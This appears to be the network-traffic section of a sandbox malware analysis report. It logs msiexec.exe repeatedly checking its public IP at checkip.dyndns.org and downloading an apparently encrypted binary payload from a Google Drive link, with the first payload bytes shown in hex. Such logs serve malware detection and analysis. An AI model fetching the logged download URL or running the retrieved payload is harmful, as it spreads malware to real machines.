Jan 10, 2025 16:02:44.911041975 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 16:02:46.331145048 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 16:02:46.539545059 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49921	193.122.6.168	80	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:47.177603006 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 16:02:47.813488007 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49927	193.122.6.168	80	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:48.416366100 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 16:02:49.053034067 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49939	193.122.6.168	80	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:49.700997114 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 16:02:50.338061094 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49947	193.122.6.168	80	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:51.132606983 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 16:02:51.790949106 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49958	193.122.6.168	80	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:52.403361082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 16:02:53.047909021 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49970	193.122.6.168	80	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:53.667634010 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 16:02:54.297077894 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49861	172.217.16.206	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:39 UTC	216	OUT	GET /uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 15:02:40 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 15:02:40 GMT Location: https://drive.usercontent.google.com/download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-f1ZW-mXgKuu6TyKwPHChAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49871	142.250.181.225	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:40 UTC	258	OUT	GET /download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 15:02:43 UTC	4941	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgQEu9w2dh3U17VU3Msi1yYqJCuO80vsDyU4T8FUcVK1sA3I-4IMYIICADLS2AWqJGP4 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="NmDjHJYUcmpluvDtn149.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 133696 Last-Modified: Mon, 07 Oct 2024 14:32:58 GMT Date: Fri, 10 Jan 2025 15:02:43 GMT Expires: Fri, 10 Jan 2025 15:02:43 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=/EQpnQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 15:02:43 UTC	4941	IN	Data Raw: 9f ec 48 ca d6 05 8a c8 83 33 60 bc 95 19 e9 67 a1 26 7f 7e 2c 1a d6 a7 a8 75 dc f8 d4 6c 8b a5 93 4d c6 fe 2f 3b 77 b3 a3 f2 e6 aa 6c 20 5f 5a e9 7b 0c 35 42 d5 09 19 c1 c0 3a b7 96 72 d2 61 d8 53 45 1e d0 e1 d5 74 93 92 18 0f 2c e3 08 90 d8 04 b4 c1 69 50 1f c4 29 85 8c 38 65 fe 7c 6e ce f3 b5 2d 05 f1 f3 13 b9 f4 10 2a 7e f2 1d 44 a1 87 56 6e 04 ca 2a 32 3e 88 d9 37 9f 4f 8a 3c 53 62 a8 93 13 b8 50 68 4b 91 7c 7c 0e 38 e3 c6 b0 50 bc c7 9c b3 5a 8b 96 d0 f2 f4 93 9e d3 c8 7e 37 01 ee 28 a0 fb 52 b0 1b 5a 18 1f bf d1 04 e1 f8 f0 14 54 b3 03 2a 0c 47 d7 a7 cd aa 14 c5 02 42 79 3b dc f6 00 fc 4d b9 be 84 c7 9b a4 96 ea 6b 3d d6 67 e7 0e ab 4f 8f bf c0 5f 88 51 f3 c4 0c 40 64 39 72 cf c9 b1 bb c1 df 4c 8f 7f e1 2b 5c 17 c9 53 b1 c8 2d 1b b0 6c 11 96 11 e8 Data Ascii: H3`g&~,ulM/;wl _Z{5B:raSEt,iP)8e\|n-~DVn2>7O<SbPhK\|\|8PZ~7(RZT*GBy;Mk=gO_Q@d9rL+\S-l
2025-01-10 15:02:43 UTC	4816	IN	Data Raw: 94 06 34 cd 83 c4 fa d0 d0 e5 9e aa 3f 06 29 12 cd aa 8a 27 8a 82 ea 16 ab b1 d8 d0 de a2 aa f9 aa a4 05 7d 4e e9 d1 ca b8 b1 de e0 51 52 09 5e a7 f6 df eb 3a 47 ff c4 32 27 c0 e8 9f 62 05 d2 d3 5e 3f 7e 41 7b 9a d9 f9 ba 37 7e 19 17 44 27 32 02 ca a6 21 eb a7 28 2e ce 98 96 90 66 54 ea 84 c5 ff fd 0d 7e f5 1c 8c f4 9a d0 15 7a c5 a9 10 52 3b c0 68 db 8b 20 03 28 45 ef 39 6e 99 f4 fb aa a0 5f 34 39 23 9f c7 08 e4 2a f1 11 67 b2 0d a5 0e 01 c1 98 03 bf aa 4f bf 4f b0 af e6 e6 32 74 a4 90 81 04 26 70 3f 18 9b 95 b3 b0 1a 3d 3b 34 56 af 8b 9f 30 90 a4 33 50 25 11 16 e1 bb 37 e5 1e 74 75 0e 9f 67 c6 1b 3e a8 1c 46 7f c8 44 10 40 c2 38 64 19 2e 4b 56 f8 ce 40 d0 3e f7 78 6a d6 34 c8 56 d1 08 31 c3 48 aa 00 7f 28 88 96 97 f6 03 86 a7 b6 09 d8 2c d4 ac 56 d5 ea Data Ascii: 4?)'}NQR^:G2'b^?~A{7~D'2!(.fT~zR;h (E9n_49#*gOO2t&p?=;4V03P%7tug>FD@8d.KV@>xj4V1H(,V
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: e8 14 79 d3 ec c1 03 60 03 e3 99 aa 5a ab 23 f7 3f b7 88 c7 f4 25 5f 96 fc fc 4b 75 fb 58 9a a4 d0 8b 35 19 03 c0 21 cc 1c e4 a2 86 56 44 c2 ef 86 ea e6 55 8d f8 a8 06 f8 f7 af f5 33 3d a6 6b 93 97 a3 23 f6 df 4c 8a 8e 2f b6 ac 7a da 34 ad 58 dc e9 33 2f b5 07 e6 1c 80 15 4b 94 82 73 a1 99 6b 18 7f 68 ee e6 91 fa 58 8b a9 cf c0 54 ae bb 92 a4 83 b9 ba d9 18 80 79 58 b6 ce 54 1d dd 05 15 5a e0 e1 e1 9c 74 87 05 bc c0 d0 b3 5f a3 23 66 51 90 fd 2f 1e d0 85 a2 f6 12 51 b5 ab 4d 00 64 f3 2a ef 49 05 b0 71 d8 7f a3 9f 01 2a c0 2c a1 55 6a 71 87 21 2d 2b 43 b0 db 0b 84 fd 40 d6 18 dd 50 7c 66 d0 27 2a 79 e7 74 f1 57 6f b7 9c 47 61 30 eb 71 a5 2a 4a a0 7e a1 4f aa 3c 71 3b 4e a7 3e d5 15 74 ea 17 7c ac b3 9a be 3f 89 0d 09 c2 1e d3 e1 d5 74 97 93 18 bc 67 1c 15 Data Ascii: y`Z#?%_KuX5!VDU3=k#L/z4X3/KskhXTyXTZt_#fQ/QMdIq,Ujq!-+C@P\|f'ytWoGa0qJ~O<q;N>t\|?tg
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: 14 bb 99 38 c9 1f 33 d3 ee e0 9a 08 05 2b 6d 1f 6a dd 23 15 7e f5 fc 33 3d 1b 83 ca 94 97 14 64 9c ec d0 0b 6a 3b 86 55 79 5a a1 23 c6 37 d8 54 c7 f4 5c f6 48 ec d3 68 33 77 4d 90 c7 f3 c1 1d 4a 05 e8 60 12 1c ee ae 81 3c 2d 0c fa 82 e8 15 cf 8e 88 be 2f 8b e1 a7 5d 00 d0 a2 6c 8b 91 22 9a ae de 4d af 98 2c d4 8f 58 dc 23 83 81 62 e9 39 03 8c be f0 8d a7 17 13 5e 93 76 bd 10 4e 32 72 16 c2 ea 96 8c 4d 5c a9 bf a5 90 6c bb 98 a3 f1 9b b6 b6 ab 93 7d 5b a7 4b 54 1d d3 79 d6 71 f8 fa e6 e2 d4 f5 a9 a1 b4 df 9b ee a2 30 64 32 5a 85 81 6e f8 ea b1 f2 18 2f 77 c4 e2 0a 64 e8 34 fd d5 4c 9d aa 07 4d a4 ea f0 29 c0 5c 02 5c 70 48 31 54 38 21 e1 94 ac 78 1a eb 4a a6 66 e9 4d 08 9d cd 02 06 ef c2 6e 89 4e 7d b7 9e 15 5c 4b 9b 59 1f 45 8c aa 7e bf 45 aa 3c 71 3b 42 Data Ascii: 83+mj#~3=dj;UyZ#7T\Hh3wMJ`<-/]l"M,X#b9^vN2rM\l}[KTyq0d2Zn/wd4LM)\\pH1T8!xJfMnN}\KYE~E<q;B
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: 4a bb 75 c2 72 6c df 98 06 f9 53 e2 50 de 60 26 d5 92 63 0d f9 6b 3a 22 5f 7e 24 f4 bc 3c 72 b5 38 c3 70 6d d2 ee ea 5a 18 0c 55 5b 1f 6a d9 18 32 7e f4 e3 70 8d 1b c2 c3 fb 5c 30 64 96 fd c1 7c 62 33 e9 9d 0b 0e bc 23 a7 29 9f cf c7 f4 5c e0 68 fd fc 46 3e af 4d 9a d4 ec 11 5c 19 05 e9 42 e1 1c ee a4 f3 26 21 0c 8a 91 17 f2 d8 8e f9 8d 11 a3 cc a7 57 12 06 a7 7f 87 86 41 15 f6 df 47 dd 10 21 2a f9 41 b9 23 85 f8 a2 d8 39 09 a0 29 ba 8d ad 1d 12 a2 8a 76 c7 2b 09 23 7f 62 46 fe 82 9c 16 2a a9 bf a5 8b 2a bb 98 a8 fa 8a bc ab ca 84 7d 21 b6 da 54 1d dd 16 15 0f d3 f0 e6 f7 a7 ab 05 b6 b0 dc 0a 5f a2 3a 01 fa 98 92 8b 1e ae bf b1 f2 16 68 50 c4 e2 0a 68 fe 31 68 31 66 f2 11 06 68 b8 98 74 38 af 90 a0 79 6d 6d 89 5c 2e 23 cd d8 db b7 84 fd 40 d6 cd a3 34 76 Data Ascii: JurlSP`&ck:"_~$<r8pmZU[j2~p\0d\|b3#)\hF>M\B&!WAG!A#9)v+#bF*}!T_:hPh1h1fht8ymm\.#@4v
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: d2 7f 2f d6 0d c2 de 92 35 e6 ab 55 be 7f 0c 25 26 4a cc b6 0d d2 14 98 60 58 ed 55 35 4a 65 61 cf 5e 58 df 9e 63 5c 58 e2 72 ff f8 3c df 3c 4b 68 d3 6b 30 1d 72 7e 24 f0 94 76 72 99 32 bd 7e f9 d3 ea c2 d0 19 0c 5f e9 0b 7e cd 75 85 7e f5 f2 34 00 1b 83 c1 f7 5c 1c 16 34 fb c1 72 14 8b e9 99 73 5a a3 5d fc 3f b7 9d b9 d8 56 f6 92 8f 4f 40 07 7d 22 20 d4 f8 cb 35 31 87 e8 6a c6 01 63 ee 81 42 37 29 ec f4 80 eb d8 fe 5a 8d 10 f5 50 a7 57 1c 8c 86 67 f5 1e 38 a3 86 7d 68 b6 e6 1d 2a 89 6d 7e 06 9f 80 68 ff 39 79 06 24 eb f3 8d 17 60 9a fc 90 b7 03 49 81 5a 74 96 cc 8c 88 4e 3f 81 c4 af ff a4 d4 e0 a9 f1 80 b6 d1 61 1d 14 3b b6 d9 54 1d dd 16 12 79 97 4c e6 f3 d3 94 01 a7 b0 a6 a5 56 2c 59 01 fd 98 92 8b 1e c1 8b de 92 12 40 b8 c4 90 33 65 f9 49 66 54 0c 9d Data Ascii: /5U%&J`XU5Jea^Xc\Xr<<Khk0r~$vr2~_~u~4\4rsZ]?VO@}" 51jcB7)ZPWg8}h*m~h9y$`IZtN?a;TyLV,Y@3eIfT
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: 7c 1d ba 44 09 44 e5 13 34 b3 a4 c4 f8 d1 b6 f4 87 39 7f ae c4 1e 66 d2 ac bb 29 96 5c d3 7f 2f c2 dd ab de 92 34 ce 08 55 be 75 c5 41 31 4a f5 a0 80 d1 07 98 61 7d be 2b 18 4b 65 65 e7 5a cf de 98 0c c7 59 e2 78 49 62 26 df 5c 63 0d d3 2e 3a 63 42 7e 24 f4 bc cf 70 99 38 f2 71 f9 d3 ca ee 9a 19 1c 55 4b 1f 2f d9 5d 33 7e f5 f8 40 1b 1f 83 c0 0c 5c 14 64 00 e9 c1 02 6b 33 e9 99 3c 5a ab 22 c4 0f b5 99 d6 f4 56 f6 9c fc f6 51 07 05 15 81 d4 88 c3 1d 5d 05 e8 6c c6 37 ee a8 ab 42 36 0c e9 b6 98 f1 c9 8e f8 a8 0d dd e1 b6 57 64 b4 b8 7f f7 82 06 e7 f6 df 4b a5 b3 38 2c a3 69 dc 23 96 c2 de e9 28 09 a4 01 fa 8d ad 06 60 ec 67 6d b7 73 41 0b 3b 68 e4 ec 9c a3 3e 9b 83 bf af ff bd 8b 9b a9 ae 8a bb d9 6f 93 7d 40 d9 1c 4c 1d d7 12 6c 6e f8 f0 e2 9c 79 87 05 b0 Data Ascii: \|DD49f)\/4UuA1Ja}+KeeZYxIb&\c.:cB~$p8qUK/]3~@\dk3<Z"VQ]l7B6WdK8,i#(`gmsA;h>o}@Llny
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: 52 f0 f4 98 84 fb f8 61 e5 72 13 24 79 2e a2 a8 c0 3d d9 8c b5 ce 81 fc 39 70 8b 40 02 be 0a ba 34 21 21 cf 52 42 dc 61 c6 f8 db b6 fd 8a 4b 05 93 c4 6e 4e 5a ad bb 23 ea 80 cb 7f 5f ea b8 ab de 98 5b 08 86 55 b4 75 56 2b 31 4a ba b2 8d f9 7f 98 61 7b e8 25 09 47 16 ab e7 5a 52 cc 97 1d e4 2b 2c 78 8d 6a 35 cf 5d 6f 62 1c 6b 3a 69 52 71 56 d2 a1 3c 02 e7 36 c3 70 fd fb a7 ea 9a 13 7e 7d 53 1f 1a aa 8d 32 7e ff 97 91 84 1b 89 c0 ea 50 7b ab 96 ec cb 13 6b 41 d3 84 79 2a d5 2d d7 3f b3 b1 8e f4 56 fc e4 d4 ee 40 77 04 9d 9a d4 f2 ae e4 19 05 e2 6a b2 34 ee ae 85 31 f1 0c fa 8c 89 e0 a6 aa f8 a8 03 af cd a5 57 66 38 8b 29 87 80 24 b5 08 de 5e bd 89 2a 06 85 78 cd 34 ea 3a dc e9 33 09 a4 2a fb 8d bc 06 76 f1 5b 76 b7 09 43 23 6e 79 9a c0 96 88 3a b5 60 bf af Data Ascii: Rar$y.=9p@4!!RBaKnNZ#_[UuV+1Ja{%GZR+,xj5]obk:iRqV<6p~}S2~P{kAy-?V@wj41Wf8)$^x4:3*v[vC#ny:`
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: 38 5f 86 22 65 36 24 fe 1d b2 e3 8b b0 bd 25 ab 30 9a 45 e2 65 a7 2a f5 36 43 c2 8e 38 36 33 f4 9c 2c a0 cd 13 63 6a 7c 90 db 06 d3 a8 d1 3b a0 08 49 ce f1 de 8f 1f f3 4a 70 76 11 b2 4e 22 44 c9 78 48 a8 94 cf f8 5d b3 ec 86 1e 7f 8f d5 1e 18 f2 ad bb 2d ea 08 c4 7f 5f d4 f5 fd de 92 3e d8 78 54 b4 73 47 51 30 4a bc b5 50 b8 14 98 60 55 d6 2b 18 40 17 01 f0 5a 28 c8 15 0f ea 58 e3 5d 9b 1e 0b df 4c 67 25 d7 6b 3a 65 2c c8 24 f4 b6 4e 72 84 38 b3 58 9c d3 ee e0 e4 28 0c 55 4f 37 20 d9 5d 38 00 fb f8 40 80 33 c9 c0 fb 56 b6 70 82 f8 e9 b5 7b 33 e3 ed fd 5a ab 22 dc 3f b0 eb 65 e3 56 86 f9 44 f6 40 0d 77 4a e4 ff f8 c1 31 67 29 e8 6a c8 6f 57 ae 81 48 59 b6 fa 86 90 f1 f0 0c f8 a8 0d c0 6c e7 57 16 2f 86 69 f5 fa 32 a3 86 7d 68 b8 b0 89 2a 89 63 7e 06 9d 80 Data Ascii: 8_"e6$%0Ee6C863,cj\|;IJpvN"DxH]-_>xTsGQ0JP`U+@Z(X]Lg%k:e,$Nr8X(UO7 ]8@3Vp{3Z"?eVD@wJ1g)joWHYlW/i2}hc~
2025-01-10 15:02:43 UTC	1390	IN	Data Raw: a3 f9 a1 1b a1 49 3e 47 3b 7f 59 f1 82 35 3c a4 b0 c1 ad 24 22 c5 94 93 77 82 b5 e4 0a 38 5f 86 20 65 74 2a fe 1d b2 ee e9 ce 98 2f 09 1c 43 60 f8 1d 26 3f 87 3e fc e7 e5 38 33 33 f4 9c a6 cc d1 61 ef 04 86 f8 79 5e 80 f5 d1 31 ad 31 b5 df e7 fc c8 70 8b 4c 70 a2 0e 9f 6c 3d 44 cf 58 5b ab a4 ee ab d1 b6 e6 58 39 7f 8f c4 34 27 97 ad bb 2b 98 5c d3 8c 2f c2 dd be de 92 34 c6 87 55 be 79 7e 41 31 4a bc a1 80 d1 14 98 61 12 fb 2b 18 ed 65 65 e7 4c 59 df 98 1f ea 58 e2 3d 8d 60 27 df 4c 63 0d b7 6a 3a 63 5d 7f 24 f4 3e 3e 72 99 28 c3 70 f9 96 ee ea 9b 19 0c 55 4b ae 68 d9 5d 6d 7f f5 f8 50 80 1b 83 d0 fb 5c 14 21 96 ec c0 02 7b 33 e9 1f 7d 5a ab d1 d7 3f b7 e1 c2 f4 56 e6 96 fc f6 05 07 77 4c 89 e4 fa c1 58 19 05 e8 76 cc 1c ff ae a9 d6 36 0c f0 8d 9d e2 dd Data Ascii: I>G;Y5<$"w8_ et*/C`&?>833ay^11pLpl=DX[X94'+\/4Uy~A1Ja+eeLYX=`'Lcj:c]$>>r(pUKh]mP\!{3}Z?VwLXv6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
